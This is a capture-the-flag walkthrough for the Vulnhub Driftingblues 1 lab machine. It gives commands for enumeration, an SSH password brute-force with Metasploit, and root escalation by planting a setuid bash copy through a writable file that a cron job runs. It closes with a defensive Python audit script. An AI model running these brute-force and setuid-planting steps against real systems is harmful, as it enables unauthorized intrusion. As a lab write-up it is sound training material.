
Vulnhub – Driftingblues 1 – Walkthrough – Writeup

We are going to exploit the driftingblues1 machine from Vulnhub. Our goal is to capture the user and root flags. Also, make sure to check out the walkthroughs on the Harry Potter series.



fping -aqg


ports=$(nmap -p- --min-rate=1000 -T4 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -sC -sV

gobuster dir

gobuster dir -u -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

We have secret.html and index.html files. So, we can open them in browsers or use curl for the sake of saving time.



There is an email ` So, we might speculate that there is a user sheryl and the hostname of the server is We have to add that to hosts file. Meanwhile, let’s find some other information from the page.

echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d 

Information gathered from the page:

  1. The hostname is
  2. There are two users eric and sheryl.
  3. There is another path in the URL /noteforkingfish.txt.

Let’s check the path /secret.html.


It just tells us to dig deeper. We will!

Add to hosts file

sudo vi /etc/hosts

Open /noteforkingfish.txt


I am afraid now seeing these Ook messages with different punctuations. Maybe it’s some encoded message. We will search the internet for this.

I used another website to decode the message.

This means, we haven’t yet identified the secret location which seems to be some subdomain of We can enumerate virtual hosts using gobuster.

gobuster – vhost

gobuster vhost -u --wordlist /usr/share/wordlists/dirb/common.txt

We found out a vhost Hence, we will also be adding this host to our hosts file.

sudo vi /etc/hosts

Now, we will curl to the newly found url.


Let’s enumerate this host using ZAP or nikto, whichever you feel comfortable with.

nikto -h

We saw that /ssh_cred.txt is giving us 200 OK status. Let’s visit that file from firefox.

Now, we know the format of the password. However, there needs to be a digit at the end of it. So, we have to brute-force to get entry. For this, we can simply create a wordlist using a script (bash or python or any) or manually whichever is faster for you.

for i in {0..9}; do echo "1<snip>y${i}"; done | tee wordlist

Also, during our initial enumeration we found out there are two users – eric and sheryl. Hence, we are going to perform brute-force for these users using metasploit framework.


use auxiliary/scanner/ssh/ssh_login
set username eric
set pass_file wordlist
set rhosts
set verbose true

We found out the password of user eric.

Privilege User – eric

Now, we can do ssh with the credentials.

ssh eric@

Privilege Root

I will be using my two favourite tools, and pspy to enumerate further. does a Linux enumeration whereas pspy does unauthenticated process snooping. For that to work, you have to create a server on the local machine and serve those files.

On attacker (local) machine:

python -m http.server 8080

On target machine:

./ | tee output
chmod +x
chmod +x pspy64

We found the cron job. Also, there might be another vulnerability in the sudo version.



On running pspy64, we found that a backup script runs every minute and that it invokes another script from the /tmp directory.

Now, let’s examine the script.

cat /var/backups/

The file which we saw earlier in the enumeration is a result of this script. Also, the developer has included a backdoor in the script. Now, it’s easy to get another shell, or a reverse shell, or we can add an SSH entry, or we can also change the password of the root user. We have infinite possibilities. For this, we just have to update the /tmp/emergency file and make it executable.

Add a custom bash

nano /tmp/emergency
chmod +x /tmp/emergency

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

The above line copies the bash binary and sets the setuid bit on the copy. Therefore, when root executes this line, we get a copy of bash that is owned by root and has the setuid bit set. Bash normally drops the elevated effective UID on startup, so we pass the -p flag to keep it and run as root.


Now, we can try to impersonate the root user.

/tmp/bash -p

We got the root access.

cat /root/root.txt

We got the root flag.
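The root cause of this escalation is a root-run script that executes a file from a world-writable directory. As an added example (not part of the original walkthrough), this Python audit walks every absolute path a privileged script references and reports the first component a non-root user could create or replace. The sample tree, the script name backup_job.sh and its contents are constructed assumptions; only /tmp/emergency comes from the page.

```python
import os, re, stat, tempfile

# Absolute paths as they appear in shell text, e.g. /tmp/emergency
ABS_PATH = re.compile(r"(?:^|[\s;&|=\"'(])((?:/[\w.+-]+)+)")
LOOSE = stat.S_IWGRP | stat.S_IWOTH  # writable by group or others

def weak_link(path, trusted=(0,), root="/"):
    """Return the first component of `path` (looked up under `root`) that an
    untrusted user could create or replace, or None. Symlinks are followed."""
    cur = root
    for part in path.strip("/").split("/"):
        st = os.stat(cur)  # directory that holds `part`
        nxt = os.path.join(cur, part)
        present = os.path.lexists(nxt)
        # Sticky bit protects only existing entries that have a trusted owner.
        kept = (st.st_mode & stat.S_ISVTX and present
                and os.lstat(nxt).st_uid in trusted)
        if st.st_uid not in trusted or (st.st_mode & LOOSE and not kept):
            return cur
        if not present:
            return None  # missing, but only trusted users can create it
        cur = nxt
    st = os.stat(cur)
    return cur if st.st_uid not in trusted or st.st_mode & LOOSE else None

def audit_script(script, trusted=(0,), root="/"):
    """Return (referenced_path, weak_component) pairs for a root-run script."""
    refs = [script]
    with open(os.path.join(root, script.lstrip("/")), encoding="utf-8") as fh:
        for line in fh:
            if not line.lstrip().startswith("#"):  # skip shebang and comments
                refs += ABS_PATH.findall(line)
    found = ((ref, weak_link(ref, trusted, root)) for ref in refs)
    return [(ref, weak) for ref, weak in found if weak]

def build_sample():
    """Constructed tree (not the machine's files): a job that runs /tmp/emergency."""
    root = tempfile.mkdtemp()
    for name, mode in (("opt", 0o755), ("tmp", 0o1777)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    job = os.path.join(root, "opt", "backup_job.sh")
    with open(job, "w", encoding="utf-8") as fh:
        fh.write("#!/bin/bash\ntar -czf /opt/backup.tgz /opt/data\n/tmp/emergency\n")
    os.chmod(job, 0o755)
    return root

if __name__ == "__main__":
    sample = build_sample()
    print(audit_script("/opt/backup_job.sh", (0, os.getuid()), sample))
```

On a live host, call `audit_script` with the default `root="/"` and `trusted=(0,)` for each script that root's crontab runs; any finding means the job should call only root-owned files in root-owned, non-writable directories.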


I learnt about Ook encoding from this machine. Other than that, we got to use gobuster vhost enumeration. Since the machine was labelled as easy, it is easy. I will do driftingblues2 soon.
